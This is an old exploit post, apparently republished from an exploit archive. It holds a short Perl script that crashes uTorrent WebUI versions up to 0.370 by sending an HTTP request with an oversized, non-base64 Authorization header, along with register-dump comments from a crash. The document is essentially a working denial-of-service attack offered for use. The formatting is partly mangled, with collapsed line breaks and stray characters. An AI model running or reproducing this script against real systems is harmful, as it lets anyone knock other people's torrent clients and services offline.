uTorrent WebUI <= v0.370 Authorization header DoS Exploit
Posted on 02 April 2010
========================================================= uTorrent WebUI <= v0.370 Authorization header DoS Exploit ========================================================= # Exploit Title: uTorrent WebUI <= v0.370 Authorization header DoS Exploit # Author: zombiefx darkernet[at]gmail.com # Software Link:http://download.utorrent.com/2.0/utorrent.exe # Version: ?Torrent 2.0 (build 18488) / WebUI <=v0.370 # Tested on: Windows XP SP3 #Code: #!/usr/bin/perl # lame usage: ./UTweb.pl # EAX 00000000 ECX 00000000 EDX 00000001 EBX 003D8360 ASCII "admin" ESP 0141FE94 # EBP 0141FF08 ESI 00000000 EDI 01511958 EIP 0041BC62 uTorrent.0041BC62 # Good luck! corelanc0d3r use warnings; use strict; use IO::Socket; my $nonbase64 = "x41" x 1000; # That was pointless my? $sock = IO::Socket::INET->new(PeerAddr =>$ARGV[0],PeerPort =>$ARGV[1],Proto => 'tcp'); print $sock "GET / HTTP/1.1 ". "Authorization: Basic $nonbase64 "; # Inj3ct0r.com [2010-04-02]
